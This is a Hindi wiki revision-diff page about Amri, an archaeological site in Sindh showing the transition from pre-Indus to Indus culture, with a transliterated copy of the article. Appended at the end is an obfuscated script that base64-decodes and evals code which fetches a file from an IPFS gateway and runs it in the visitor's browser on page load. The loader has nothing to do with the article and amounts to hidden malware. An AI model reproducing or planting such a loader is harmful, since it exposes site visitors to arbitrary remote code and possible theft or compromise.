Difference between revisions of "आमरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
 
Line 1: Line 1:
'''आमरी''' [[पाकिस्तान]] के [[सिंध]] में स्थित है। इस स्थल की खोज एन.जी. मजूमदार द्वारा सन [[1929]] ई. में की गई तथा बाद में जीन कजाल ने इस स्थल का [[उत्खनन]] कराया।  
+
'''आमरी''' [[पाकिस्तान]] के [[सिंध]] में स्थित है। इस स्थल की खोज एन.जी. मजूमदार द्वारा सन् [[1929]] ई. में की गई तथा बाद में जीन कजाल ने इस स्थल का [[उत्खनन]] कराया।  
 
*आमरी की एक विलक्षण बात यह है कि यहाँ प्रागैतिहासिक, सिन्धु पूर्व [[संस्कृति]] और परवर्ती [[सिन्धु सभ्यता]] के बीच संक्रमण का काल परिलक्षित होता है।  
 
*आमरी की एक विलक्षण बात यह है कि यहाँ प्रागैतिहासिक, सिन्धु पूर्व [[संस्कृति]] और परवर्ती [[सिन्धु सभ्यता]] के बीच संक्रमण का काल परिलक्षित होता है।  
 
*आमरी में मिले मकानों के अवशेषों से पता चलता है कि लोग पत्थर और [[मिट्टी]] की [[ईंट (लेखन सामग्री)|ईंटों]] के मकानों में रहते थे।  
 
*आमरी में मिले मकानों के अवशेषों से पता चलता है कि लोग पत्थर और [[मिट्टी]] की [[ईंट (लेखन सामग्री)|ईंटों]] के मकानों में रहते थे।  

Latest revision as of 14:01, 6 March 2012

amari pakistan ke siandh mean sthit hai. is sthal ki khoj en.ji. majoomadar dvara sanh 1929 ee. mean ki gee tatha bad mean jin kajal ne is sthal ka utkhanan karaya.

  • amari ki ek vilakshan bat yah hai ki yahaan pragaitihasik, sindhu poorv sanskriti aur paravarti sindhu sabhyata ke bich sankraman ka kal parilakshit hota hai.
  • amari mean mile makanoan ke avasheshoan se pata chalata hai ki log patthar aur mitti ki eeantoan ke makanoan mean rahate the.
  • unhoanne anaj ko rakhane ke liye annagar bhi banae the.
  • ve mitti ke bartanoan par bharatiy kub dadar bailoan jaise pashuoan ke chitr banate the.
  • ve chak par bane mitti ke patroan ka bhi prayog karate the.
  • yahaan par h dappa ki sabhyata shuroo hone se pahale hi bastiyoan ki qilebandi shuroo kar di gee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>